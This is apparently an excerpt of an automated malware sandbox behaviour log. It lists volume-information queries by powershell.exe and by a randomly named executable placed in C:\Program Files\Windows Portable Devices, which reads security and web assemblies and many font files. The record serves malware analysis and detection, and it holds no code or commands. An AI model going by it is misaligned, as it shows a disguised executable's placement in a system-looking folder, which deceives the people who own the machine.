Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
